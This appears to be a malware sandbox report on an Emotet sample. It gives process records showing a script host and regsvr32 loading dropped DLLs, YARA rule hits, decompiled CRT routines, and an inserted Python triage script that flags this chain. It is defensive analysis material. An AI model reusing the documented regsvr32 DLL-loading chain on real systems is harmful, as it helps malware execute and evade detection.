                                                                                          • Rule: WEBSHELL_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                          Reputation:moderate

                                                                                          Target ID:3
                                                                                          Start time:09:06:41
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
                                                                                          Imagebase:0x7ff6d5170000
                                                                                          File size:24064 bytes
                                                                                          MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate

                                                                                          Target ID:4
                                                                                          Start time:09:06:44
                                                                                          Start date:20/03/2023
                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
                                                                                          Imagebase:0x7ff6d5170000
                                                                                          File size:24064 bytes
                                                                                          MD5 hash:578BAB56836A3FE455FFC7883041825B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
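The four process records above show the whole chain: wscript.exe runs click.wsf from the Desktop, regsvr32.exe registers rad75349.tmp.dll from the same user-writable folder, then a second regsvr32.exe registers a copy dropped into a random subdirectory of System32. The triage script below is an added example written for this report, not Joe Sandbox code and not Emotet code; it parses the "Key:Value" blocks as printed and applies three rules mirroring that chain. The rule wording and path heuristics are my assumptions, not the sandbox's signatures, and the embedded records copy only the Target ID, Path and Commandline fields from above.

```python
"""
Added example: process-chain triage over the four targets listed above. Not Joe
Sandbox code and not Emotet code. Rules (assumptions, not sandbox signatures):
  1. a script host running a script from a user profile path,
  2. regsvr32 registering a DLL from a user-writable path or with a .tmp name,
  3. regsvr32 registering a DLL from a subdirectory of System32.
"""
import re
from pathlib import PureWindowsPath

WIN_PATH = re.compile(r'[A-Za-z]:\\[^"\s]+')  # path-like tokens in a command line
SYSTEM32_SUBDIR_DLL = re.compile(r'^c:\\windows\\system32\\[^\\]+\\[^\\]+\.dll$')
SCRIPT_EXT = (".wsf", ".vbs", ".vbe", ".js", ".jse")


def parse_targets(report: str) -> list[dict]:
    """Turn blank-line separated 'Key:Value' blocks into dicts keyed as printed."""
    targets = []
    for block in re.split(r"\n\s*\n", report.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.strip().partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            targets.append(rec)
    return targets


def command_line_paths(cmdline: str) -> list[str]:
    """Extract Windows paths from a command line. Tolerates the broken quoting on
    target 3 (regsvr32.exe" "...rad75349.tmp.dll) because it never relies on quotes."""
    return WIN_PATH.findall(cmdline)


def evaluate(target: dict) -> list[str]:
    """Apply the three rules to one process record; returns the rule hits in order."""
    image = PureWindowsPath(target.get("Path", "")).name.lower()
    args = command_line_paths(target.get("Commandline", ""))[1:]  # drop the image itself
    hits = []
    for arg in args:
        low = arg.lower()
        in_user_profile = low.startswith("c:\\users\\")
        if image in ("wscript.exe", "cscript.exe") and low.endswith(SCRIPT_EXT) and in_user_profile:
            hits.append(f"script host running a script from a user profile path: {arg}")
        if image == "regsvr32.exe" and low.endswith(".dll"):
            if in_user_profile:
                hits.append(f"regsvr32 loading a DLL from a user-writable path: {arg}")
            if ".tmp." in PureWindowsPath(low).name:
                hits.append(f"regsvr32 loading a DLL with a .tmp name (Sigma: run temp file via regsvr32): {arg}")
            if SYSTEM32_SUBDIR_DLL.match(low):
                hits.append(f"regsvr32 loading a DLL from a subdirectory of System32: {arg}")
    return hits


def triage(report: str) -> dict[int, list[str]]:
    """Map each Target ID in the report text to its rule hits."""
    return {int(t["Target ID"]): evaluate(t) for t in parse_targets(report)}


# Target ID, Path and Commandline copied from the four process records above.
REPORT_TARGETS = r"""
Target ID:0
Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail

Target ID:1
Path:C:\Windows\System32\wscript.exe
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"

Target ID:3
Path:C:\Windows\System32\regsvr32.exe
Commandline:C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll

Target ID:4
Path:C:\Windows\System32\regsvr32.exe
Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
"""

if __name__ == "__main__":
    for target_id, hits in triage(REPORT_TARGETS).items():
        print(f"Target {target_id}:", hits or "no hits")
```

Rule 3 is the loosest of the three: legitimate installers do register DLLs under System32 subdirectories, so in production it should be paired with the file-creation event (the report's "Drops PE files to the windows directory" signature) rather than used alone.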


                                                                                            Execution Graph

                                                                                            Execution Coverage:8.1%
                                                                                            Dynamic/Decrypted Code Coverage:25.8%
                                                                                            Signature Coverage:20.6%
                                                                                            Total number of Nodes:97
                                                                                            Total number of Limit Nodes:4

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1501882145.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_450000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                            • String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
                                                                                            • API String ID: 394283112-3605381585
                                                                                            • Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                            • Instruction ID: a0d8ef5f41e444f4264570b3b04b3092f1b62f2b0325f5afb8800becf619d025
                                                                                            • Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
                                                                                            • Instruction Fuzzy Hash: 8E521634618B488BC719DF18D8857BAB7E0FB55305F14462EEC8BC7252DB38E546CB8A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
                                                                                            • API String ID: 0-383957222
                                                                                            • Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                            • Instruction ID: e72b5e28e5770599b69a38d0d014e98f65006602cc2aaf73b84de83a25e9e2bc
                                                                                            • Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
                                                                                            • Instruction Fuzzy Hash: 3AC1CD71519780AFD388CF28C58A91BBBF0FBD4748F906A1DF89686260D7B4D949CF02
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                            • String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
                                                                                            • API String ID: 2485490239-3005932707
                                                                                            • Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                            • Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
                                                                                            • Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
                                                                                            • Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: )s$)y_$3`d!$GX$lo$=
                                                                                            • API String ID: 0-308291206
                                                                                            • Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                            • Instruction ID: 56241bcc6ca1c12db65d8080260bbe225d900293cca06beb0e04a1d44b4ba830
                                                                                            • Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
                                                                                            • Instruction Fuzzy Hash: 4D912AB150074A8BEB58CF28C88A4DE3FA1FB58358F65422CFC4AA6290D778D595CFC5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: /Q$;$F8$KT$F$Z
                                                                                            • API String ID: 0-1951868783
                                                                                            • Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                            • Instruction ID: fdd1122faef2d0261e4c4dd121ff5d067f6eacde0ef3a443f4b52587e5093afe
                                                                                            • Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
                                                                                            • Instruction Fuzzy Hash: BE6147B1E147098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 37%
                                                                                            			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
                                                                                            				long long _v32;
                                                                                            				long long _v40;
                                                                                            				intOrPtr _v48;
                                                                                            				intOrPtr _v52;
                                                                                            				intOrPtr _v56;
                                                                                            				intOrPtr _t15;
                                                                                            				long long _t19;
                                                                                            				long long _t20;
                                                                                            
                                                                                            				_a24 = _t20;
                                                                                            				_a16 = _t15;
                                                                                            				_a8 = _t19;
                                                                                            				_v56 = _a16;
                                                                                            				if (_v56 == 1) goto 0x80010ae6;
                                                                                            				goto 0x80010bf4;
                                                                                            				 *0x80022ca0 = _a8;
                                                                                            				_v52 = 0x904;
                                                                                            				_v48 = 0xf9e;
                                                                                            				_v40 = 0;
                                                                                            				_v32 = 0;
                                                                                            				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
                                                                                            				ExitProcess(??);
                                                                                            			}
                                                                                            Instruction addresses: 0x180010ac0, 0x180010ac5, 0x180010ac9, 0x180010ad6, 0x180010adf, 0x180010ae1, 0x180010aeb, 0x180010af2, 0x180010afa, 0x180010b02, 0x180010b0b, 0x180010b1b, 0x180010b22

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                            • Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
                                                                                            • Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
                                                                                            • Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0c$\$c2&
                                                                                            • API String ID: 0-1001447681
                                                                                            • Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                            • Instruction ID: 4438beab00c766664f2a7a08f5d8d0be7321fec4d5e8c1abafd51a44c14f67a2
                                                                                            • Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
                                                                                            • Instruction Fuzzy Hash: AE02E6715083C8CBEBBECF64C889ADA7BADFB44708F10521DEA4A9E258DB745744CB41
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .f$M$N5
                                                                                            • API String ID: 0-1477915503
                                                                                            • Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                            • Instruction ID: f4506d7bcbb1492cdaab79765df4767828b70e7821b7a9aaf5ca2d70049259d9
                                                                                            • Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
                                                                                            • Instruction Fuzzy Hash: FEA160705197449FD7E8DF28C8C959EBBE0FB94304F906A1DF8869B2A0CB78D945CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

Control-flow graph (rendered as text in the export; the edge list is omitted here): basic blocks 748fc8 through 749421; calls to the internal routines 749f38, 74464c, 74eac0, 751684, 7387dc and 7449b0; no imported API is called directly from this function.
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A]jN
                                                                                            • API String ID: 0-1761522205
                                                                                            • Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                            • Instruction ID: 5df0604ba80eb93bfca29cca2a312bd627ddd7579ff9d377ea3875bf63aba9b3
                                                                                            • Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
                                                                                            • Instruction Fuzzy Hash: C6D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F11422DD516BB290D7785A46CFD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C
                                                                                            • API String ID: 0-3705061908
                                                                                            • Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                            • Instruction ID: d28a233f248adf134e37d9b1b03e47c63eababc583530b4d5471050845282a3d
                                                                                            • Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
                                                                                            • Instruction Fuzzy Hash: E461D27151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

Control-flow graph (rendered as text in the export; the edge list is omitted here): basic blocks 18000147c through 180001798, i.e. the dispatcher below together with the DllMain code path around it. Named call targets: __scrt_dllmain_crt_thread_attach (block 1800014a4) and __scrt_dllmain_after_initialize_c (block 18000154a). Unnamed internal call targets: 1800010fc, 18000116c, 1800011ac, 180001224, 180001254, 180001268, 180001340, 1800013d8, 1800013fc, 1800015e4, 180001c48, 180001e44, 180001e54, 180001e70, 180001e8c, 180001e94, 180001ed0, 180006d5c, 180006da0 and 180010ac0. The function 18000147c is itself called from blocks 1800016cf and 180001741.
C-Code - Quality: 100%
/* Decompiler output as shown in the report, with the per-statement address column
 * folded into trailing comments. The symbol names the report attaches to this
 * function (__scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c,
 * __scrt_acquire_startup_lock, __scrt_release_startup_lock) are MSVC CRT startup
 * internals, so the routine is consistent with the CRT's dllmain_crt_dispatch: a
 * switch on the DllMain reason code passed in edx that returns TRUE by default.
 * Two artefacts to read past: the branch targets have lost their leading digit
 * (0x800014bd is 0x1800014bd, matching the control-flow graph), and the three
 * identical "== 0" tests cannot be the same comparison; together with the final
 * "== 1" they read like a decrement-and-test chain over reason codes 0, 1, 2, 3,
 * which agrees with the __scrt_dllmain_crt_thread_attach label on the block reached
 * by the third branch (DLL_THREAD_ATTACH == 2). That reading is an inference from
 * the graph, not something the decompiler states. */
E0000000118000147C(void* __edx) {
    void* _t5;

    _t5 = __edx;                        /* 0x180001480 */
    if (_t5 == 0) goto 0x800014bd;      /* 0x180001482 */
    if (_t5 == 0) goto 0x800014b1;      /* 0x180001487 */
    if (_t5 == 0) goto 0x800014a4;      /* 0x18000148c */
    if (__edx == 1) goto 0x8000149d;    /* 0x180001491 */
    return 1;                           /* 0x18000149c */
}

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                            • String ID:
                                                                                            • API String ID: 190073905-0
                                                                                            • Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                            • Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
                                                                                            • Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
                                                                                            • Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                            • FlsSetValue.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                            • SetLastError.KERNEL32(?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 2506987500-0
                                                                                            • Opcode ID: ab2f879cb807edc10122b4a103df6ae5f6bd6816ec7a20867b12153a3a924da4
                                                                                            • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                            • Opcode Fuzzy Hash: ab2f879cb807edc10122b4a103df6ae5f6bd6816ec7a20867b12153a3a924da4
                                                                                            • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

Control-flow graph (rendered as text in the export; the edge list is omitted here): basic blocks 743988 through 743b12; calls to the internal routines 749f38 and 73a940; the imported API CreateProcessW is called from the final block 743acc-743b12.
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID: li
                                                                                            • API String ID: 963392458-3170889640
                                                                                            • Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                            • Instruction ID: 86f07da87f41df90cffaf3c3b8b29052b3c79bb328378359c1584c532f3adb22
                                                                                            • Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
                                                                                            • Instruction Fuzzy Hash: CC41E57091CB848FDBA4DF18D08979AB7E0FB98315F20495DE48CC7296CB789884CB86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

Control-flow graph (rendered as text in the export; the edge list is omitted here): basic blocks 180008714 through 180008788; calls to the internal routines 1800086f4, 18000c08c and 18000abf8; the imported API RtlAllocateHeap is called from block 18000875a-180008772.
C-Code - Quality: 44%
/* Decompiler output as shown in the report (44% quality: several statements are only
 * partially recovered), with the per-statement address column folded into trailing
 * comments. Shape of the routine: a size check on the two arguments, one
 * RtlAllocateHeap attempt, a retry path through two internal routines when the
 * allocation fails, and otherwise errno set to 0xc (ENOMEM) through the routine at
 * 1800086F4 before returning 0. That is the shape of the CRT's _calloc_base
 * (HeapAlloc, then _query_new_mode/_callnewh, then errno = ENOMEM), and the report's
 * RtlAllocateHeap entry below shows the call is reached from 180007F92, which lies
 * inside the GetLastError/FlsSetValue/SetLastError routine listed above, where the
 * CRT allocates its per-thread data. That identification is an inference from those
 * facts, not something the report states. The two " ==  ? " expressions are
 * conditionals whose condition the decompiler could not recover; they are left as
 * emitted. */
E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
    void* __rbx;
    intOrPtr* _t22;
    signed int _t29;

    _t29 = __rdx;                                      /* 0x180008714 */
    if (__rcx == 0) goto 0x80008733;                   /* 0x180008723 */
    _t1 = _t29 - 0x20; // -32                          /* 0x180008727 */
    _t22 = _t1;                                        /* 0x180008727 */
    if (_t22 - __rdx < 0) goto 0x80008776;             /* 0x180008731 */
    _t25 =  ==  ? _t22 : __rcx * __rdx;                /* 0x18000873f */
    goto 0x8000875a;                                   /* 0x180008743 */
    if (E0000000118000C08C() == 0) goto 0x80008776;    /* 0x18000874c */
    if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776; /* 0x180008758 */
    RtlAllocateHeap(??, ??, ??); // executed           /* 0x180008769 */
    if (_t22 == 0) goto 0x80008745;                    /* 0x180008772 */
    goto 0x80008783;                                   /* 0x180008774 */
    E000000011800086F4(_t22, _t22);                    /* 0x180008776 */
    *_t22 = 0xc;                                       /* 0x18000877b */
    return 0;                                          /* 0x180008788 */
}

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,00005E1A320B5CCD,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
                                                                                            • Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
